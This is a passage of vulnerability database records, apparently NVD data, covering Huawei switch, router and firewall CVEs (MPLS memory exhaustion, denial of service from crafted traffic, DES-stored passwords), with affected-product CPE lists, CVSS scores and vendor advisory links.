                     matchCriteriaId: "75FAA4BF-1ED0-4059-ADA1-071AF1BF2882",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Huawei AR3200 with software V200R007C00, V200R005C32, V200R005C20; S12700 with software V200R008C00, V200R007C00; S5300 with software V200R008C00, V200R007C00, V200R006C00; S5700 with software V200R008C00, V200R007C00, V200R006C00; S6300 with software V200R008C00, V200R007C00; S6700 with software V200R008C00, V200R007C00; S7700 with software V200R008C00, V200R007C00, V200R006C00; S9300 with software V200R008C00, V200R007C00, V200R006C00; and S9700 with software V200R008C00, V200R007C00, V200R006C00 allow remote attackers to send abnormal Multiprotocol Label Switching (MPLS) packets to cause memory exhaustion.",
      },
      {
         lang: "es",
         value: "Huawei AR3200 con software V200R007C00, V200R005C32, V200R005C20; S12700 con software V200R008C00, V200R007C00; S5300 con software V200R008C00, V200R007C00, V200R006C00; S5700 con software V200R008C00, V200R007C00, V200R006C00; S6300 con software V200R008C00, V200R007C00; S6700 con software V200R008C00, V200R007C00; S7700 con software V200R008C00, V200R007C00, V200R006C00; S9300 con software V200R008C00, V200R007C00, V200R006C00; y S9700 con software V200R008C00, V200R007C00, V200R006C00 permiten a atacantes remotos enviar paquetes Multiprotocol Label Switching (MPLS) anormales para provocar un agotamiento de la memoria.",
      },
   ],
   id: "CVE-2016-8797",
   lastModified: "2024-11-21T03:00:06.303",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "PARTIAL",
               baseScore: 5,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2017-04-02T20:59:01.860",
   references: [
      {
         source: "psirt@huawei.com",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160608-01-mpls-en",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160608-01-mpls-en",
      },
   ],
   sourceIdentifier: "psirt@huawei.com",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-399",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2016-04-11 15:59
Modified
2025-04-12 10:46
Summary
Huawei Quidway S9700, S5700, S5300, S9300, and S7700 switches with software before V200R003SPH012 allow remote attackers to cause a denial of service (switch restart) via crafted traffic.
Impacted products
Vendor Product Version
huawei s5300_firmware v200r003c00spc500
huawei s5700_firmware v200r003c00spc500
huawei s7700_firmware v200r003c00spc500
huawei s9300_firmware v200r003c00spc500
huawei s9700_firmware v200r003c00spc500
huawei s5300 -
huawei s5700 -
huawei s7700 -
huawei s9300 -
huawei s9700 -



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:huawei:s5300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "946678A8-DE69-47F7-8E30-4B2BA0C510A8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:huawei:s5700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "435BA0E6-618F-44CC-BC5D-BF3D5E015F11",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:huawei:s7700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "A75D8053-9786-48DC-92D9-53D021BFD9DF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:huawei:s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "4FD8A1E2-CF98-4E4D-A4E4-DCCAF3C7CBD0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:huawei:s9700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                     matchCriteriaId: "E72F6D8C-8E96-4F47-B626-A8423493D882",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "2CFEF08E-54C5-4D60-AFF0-37B00D6E2DDD",
                     vulnerable: false,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "E22D3CFF-3353-4EE2-8933-84F395469D0D",
                     vulnerable: false,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "8769C2C4-E333-432B-8943-CFDFAE013379",
                     vulnerable: false,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "AD2EC926-50C6-4CBE-BB6F-56F3A6287DEE",
                     vulnerable: false,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "75FAA4BF-1ED0-4059-ADA1-071AF1BF2882",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Huawei Quidway S9700, S5700, S5300, S9300, and S7700 switches with software before V200R003SPH012 allow remote attackers to cause a denial of service (switch restart) via crafted traffic.",
      },
      {
         lang: "es",
         value: "Switches Huawei Quidway S9700, S5700, S5300, S9300 y S7700 con software en versiones anteriores a V200R003SPH012 permite a atacantes remotos provocar una denegación de servicio (reinicio de switch) a través de tráfico manipulado.",
      },
   ],
   id: "CVE-2016-3678",
   lastModified: "2025-04-12T10:46:40.837",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: true,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
      cvssMetricV30: [
         {
            cvssData: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 7.5,
               baseSeverity: "HIGH",
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               privilegesRequired: "NONE",
               scope: "UNCHANGED",
               userInteraction: "NONE",
               vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
               version: "3.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 3.6,
            source: "nvd@nist.gov",
            type: "Primary",
         },
      ],
   },
   published: "2016-04-11T15:59:10.597",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160330-01-switch-en",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160330-01-switch-en",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Deferred",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-20",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2013-06-20 15:55
Modified
2025-04-11 00:51
Severity ?
Summary
The Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, and NIP5100 use the DES algorithm for stored passwords, which makes it easier for context-dependent attackers to obtain cleartext passwords via a brute-force attack.
Impacted products
Vendor Product Version
huawei acu v100r003c01spc100
huawei acu v200r001c00
huawei acu v200r001c00spc100
huawei ar_19\/29\/49 *
huawei ar_g3 v200r001c00
huawei ar_g3 v200r001c01
huawei ar_g3 v200r002c00spc200
huawei atn v200r001c00
huawei atn v200r001c01
huawei cx200 v100r005
huawei cx300 v100r005
huawei cx600 v200r002
huawei cx600 v600r001
huawei cx600 v600r002
huawei cx600 v600r003
huawei e200_usg2200 *
huawei e200_usg5100 *
huawei e200e-b *
huawei e200e-c *
huawei e200e-usg2100 *
huawei e200e-x1 *
huawei e200e-x2 *
huawei e200x3 *
huawei e200x5 *
huawei e200x7 *
huawei eudemon_8080e *
huawei eudemon_8160e *
huawei eudemon_usg5300 *
huawei eudemon_usg5500 *
huawei eudemon_usg9300 *
huawei eudemon_usg9500 *
huawei eudemon1000 *
huawei eudemon1000e-u *
huawei eudemon1000e-x *
huawei eudemon100e v200r007
huawei eudemon200 v200r001
huawei eudemon300 *
huawei eudemon500 *
huawei eudemon8000e-x *
huawei h3c_ar\(oem_in\) *
huawei ma5200g v200r003
huawei ma5200g v300r003
huawei me60 v100r005
huawei me60 v100r006
huawei me60 v600r002
huawei me60 v600r003
huawei me60 v600r005c00spc600
huawei ne20 v200r005
huawei ne20e-x6 v300r005
huawei ne40 v300r005
huawei ne40e v300r005
huawei ne40e v600r001
huawei ne40e\/80e v600r002
huawei ne40e\/80e v600r003
huawei ne5000e v300r007
huawei ne5000e v800r002
huawei ne80 v300r005
huawei ne80e v600r001
huawei ne80e v600r002
huawei ne80e v600r003
huawei nip100 v100r001
huawei nip1000 v100r001
huawei nip200 v100r001
huawei nip2100 v100r001c00
huawei nip2200 v100r001c00
huawei nip5100 v100r001c00
huawei s2300 v100r002
huawei s2300 v100r003
huawei s2300 v100r005
huawei s2300 v100r006
huawei s2700 v100r006
huawei s3300 v100r002
huawei s3300 v100r003
huawei s3300 v100r005
huawei s3300 v100r006
huawei s3300hi v100r006
huawei s3300hi v200r001
huawei s3700 v100r005
huawei s3700 v100r006
huawei s3700 v200r001
huawei s5300 v100r002
huawei s5300 v100r003
huawei s5300 v100r005
huawei s5300 v100r006
huawei s5300hi v100r006
huawei s5300hi v200r001
huawei s5306 v100r006
huawei s5306 v200r001
huawei s5700 v100r005
huawei s5700 v100r006
huawei s5700 v200r001
huawei s6300 v100r006
huawei s6300 v200r001
huawei s6700 v100r006
huawei s6700 v200r001
huawei s7700 v100r003
huawei s7700 v100r006
huawei s9300 v100r001
huawei s9300 v100r002
huawei s9300 v100r003
huawei s9300 v100r006
huawei svn2000 v200r001c00
huawei svn3000 v100r002c02spc802b041
huawei svn5000 v200r001c00
huawei svn5300 v100r001c01b019
huawei wlan_ac_6605 v200r001c00
huawei wlan_ac_6605 v200r001c00spc100



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:huawei:acu:v100r003c01spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "CE81EA02-600F-42CE-92C8-7E1D127E9B7C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:acu:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "3A906E7E-7A10-474B-91C4-A30F7FAF55D8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:acu:v200r001c00spc100:*:*:*:*:*:*:*",
                     matchCriteriaId: "B5D1A17D-1CDD-4539-897E-A6067EAD1EE2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ar_19\\/29\\/49:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "82396118-3290-4683-902D-4955E81B84F9",
                     versionEndIncluding: "r2207",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ar_g3:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B19CE2AB-251D-478A-913C-65B5E0BBA0B5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ar_g3:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "18BA268A-EF28-477C-AC24-38E322FFE553",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ar_g3:v200r002c00spc200:*:*:*:*:*:*:*",
                     matchCriteriaId: "554B2AC0-F4C6-4805-BB39-642D6D292A97",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:atn:v200r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "2BB1A47C-FB4F-4EF8-A614-95F3B2E6065D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:atn:v200r001c01:*:*:*:*:*:*:*",
                     matchCriteriaId: "C26B81D9-0A62-4F6E-A9A4-5B22F08E0882",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:cx200:v100r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "A24ECC75-1032-4DFD-A0C3-315ABB68C50F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:cx300:v100r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "0F9BA9C4-65A8-4D9D-A21C-CEB53DB2E513",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:cx600:v200r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "D71F25CF-F4DE-4FC5-82E9-179CFFA4CA61",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:cx600:v600r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "5D94D86A-C025-4A96-A700-D676B90CBBF7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:cx600:v600r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "3F61F187-74C5-4C50-9F91-6303C87582B1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:cx600:v600r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "BB2B2269-0784-4DE2-B48A-9A36F9B30F96",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200_usg2200:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9151ED5E-04DD-4221-9669-C8112168A507",
                     versionEndIncluding: "v200r003c00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200_usg5100:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F63E41F8-8408-4E7A-A423-ACC2C44B3141",
                     versionEndIncluding: "v200r003c00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200e-b:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "8235FC6D-220F-4F75-BDD2-77FA661F33A2",
                     versionEndIncluding: "v100r005c01",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200e-c:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "04FF6514-05AF-4D86-9B10-B50BC8D0622D",
                     versionEndIncluding: "v200r003c00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200e-usg2100:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "D14FD9A2-90D5-493C-9BC7-095EBD644114",
                     versionEndIncluding: "v100r005c01",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200e-x1:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "25B60ADA-D40C-48C5-A237-DEE5DD372933",
                     versionEndIncluding: "v100r005c01",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200e-x2:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "C3502D88-6168-41E3-8641-4045C9EA9B90",
                     versionEndIncluding: "v100r005c01",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200x3:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0F6DBFF5-0B0B-4F0D-96A1-D2D487AE57C7",
                     versionEndIncluding: "v200r003c00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200x5:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "5AF99475-D5A4-407E-8A7F-D6642186E5B6",
                     versionEndIncluding: "v200r003c00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:e200x7:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0D68DD7D-29F9-460E-9D9C-A70F0DD489B1",
                     versionEndIncluding: "v200r003c00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon_8080e:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E5A801B9-7BB4-4E06-8ED2-D9EF565F313E",
                     versionEndIncluding: "v100r003c00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon_8160e:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "1E9D04EF-A73F-4BF6-AB34-3C489156BBD3",
                     versionEndIncluding: "v100r003c00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon_usg5300:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3510EF8C-F3EB-4531-A0A8-8E0734652E26",
                     versionEndIncluding: "v200r001",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon_usg5500:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F08A74A7-65FC-424C-ACAD-B6A6ED27FF60",
                     versionEndIncluding: "v200r002",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon_usg9300:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "788B8EBF-16FA-4FDD-B07A-5A4F6E6B310A",
                     versionEndIncluding: "v100r003c00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon_usg9500:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "8C625CA3-BD79-42E8-91B4-539E90FBF0C5",
                     versionEndIncluding: "v200r001c00spc600",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon1000:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "AFF18B94-150C-413F-B6D4-47B5E05DF4BA",
                     versionEndIncluding: "v200r006c02",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon1000e-u:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DBB0AFBD-5F0E-494A-A752-9EE2F81DF2C5",
                     versionEndIncluding: "v200r001",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon1000e-x:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "11D8297A-362B-4056-A94F-9D49FF0B56B7",
                     versionEndIncluding: "v200r002",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon100e:v200r007:*:*:*:*:*:*:*",
                     matchCriteriaId: "956ED431-6CE1-4873-BDC3-7832F5867C28",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon200:v200r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "5679FA9F-B4E5-42A9-9B9A-3601BE785CC4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon300:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "014E4B7B-E107-40B6-9B18-F5610959EA8B",
                     versionEndIncluding: "v200r006c02",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon500:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E0CA4ACA-0104-4A93-9FBC-DC0496A1EB70",
                     versionEndIncluding: "v200r006c02",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:eudemon8000e-x:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "7B686C4E-FD19-42B0-87A5-162D72C47BE0",
                     versionEndIncluding: "v200r001c00spc600",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:h3c_ar\\(oem_in\\):*:*:*:*:*:*:*:*",
                     matchCriteriaId: "FBDEE398-3BC9-4855-952F-44B37BF9F478",
                     versionEndIncluding: "r2209",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ma5200g:v200r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "8D17E429-865D-4677-872E-1E191BB0A6DF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ma5200g:v300r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "CD2ADD48-FBB4-4E65-8486-757D2ADA4DA3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:me60:v100r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "1AF75F78-2B91-47C3-B5AE-F4C9769B5AD8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:me60:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "18496123-2B0E-46D1-88F6-85897B2B65B4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:me60:v600r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "E0045741-3B14-435E-8B12-B536751DD24F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:me60:v600r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "AE8094F7-FAB2-4624-B2ED-467B40ADA260",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:me60:v600r005c00spc600:*:*:*:*:*:*:*",
                     matchCriteriaId: "4BC19826-AC6E-4DE1-95CA-49D4BB6F6644",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne20:v200r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "49D7692F-6EA0-4A5E-B841-2B49332FCC5D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne20e-x6:v300r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "C555EAC5-1E45-4BE5-8C69-DB1916A2EBF8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne40:v300r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "AFF2311E-D7DE-4C7C-BD88-4B947BD4F8E8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne40e:v300r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "B23A5D99-8458-4285-ABF8-FA0D2F49B811",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne40e:v600r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "5348DF82-072D-4B3B-9919-B5478420A98F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne40e\\/80e:v600r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "54C3C26D-0FD0-48B9-A168-E9C6605DCB0E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne40e\\/80e:v600r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "3D4D3971-B2DA-44EC-97A1-CFF436BF44F6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne5000e:v300r007:*:*:*:*:*:*:*",
                     matchCriteriaId: "CDA4A9B6-378D-4F4B-B88D-C13859E6236B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne5000e:v800r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "FF6322F0-0749-4C3D-9144-D92A64B9D5FB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne80:v300r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "74801C9A-31D1-4E74-9211-9AB67B5FEAB7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne80e:v600r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "AA2D277B-08F0-4F6A-BC99-FBBCA4F5207D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne80e:v600r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "A81A4563-15DC-4125-9E3D-5B9FB0360EA2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:ne80e:v600r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "449449A2-28B2-4A9A-A2C9-84A18596AEDF",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:nip100:v100r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "2BE4E8E1-AF7C-49E9-9758-887EFD8CB8F4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:nip1000:v100r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "90FF10E6-4080-4186-83DE-37703A468F3E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:nip200:v100r001:*:*:*:*:*:*:*",
                     matchCriteriaId: "6B0009DF-D44E-4D96-909F-B911D7BA127B",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:nip2100:v100r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B8CE9794-9A67-4F65-A81A-EE00AE714A88",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:nip2200:v100r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "B3DC0192-8E8B-4E0C-A91C-92094A167878",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:nip5100:v100r001c00:*:*:*:*:*:*:*",
                     matchCriteriaId: "9317FE4B-95F0-4615-9FA1-683D644BC3E7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:v100r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "871BB53D-F86F-4E3D-8DF7-875C8C1C7FDE",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:v100r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "7E655344-8341-4FFA-BBED-F5D5A15759D4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:v100r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "662EDAE9-2B0F-4774-8790-2C62997764FC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s2300:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "22621191-B2CD-4BA9-B6F1-8D59850604A6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s2700:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "142335E6-A4F5-4CC4-8D86-835C3E0E5211",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3300:v100r002:*:*:*:*:*:*:*",
                     matchCriteriaId: "AF7B5B70-1540-490F-8486-31639DB54F12",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3300:v100r003:*:*:*:*:*:*:*",
                     matchCriteriaId: "33864641-EB9A-4CCC-9057-26D22AD839BD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3300:v100r005:*:*:*:*:*:*:*",
                     matchCriteriaId: "59AD4C23-6315-4B97-85BB-1074F36F7291",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3300:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "972BB8A0-27D8-4A0A-865E-57E37F70A484",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:huawei:s3300hi:v100r006:*:*:*:*:*:*:*",
                     matchCriteriaId: "41435CB4-537C-45DC-B8DB-0C1F38F1D222",
                     vulnerable: true,
                  },
                  {
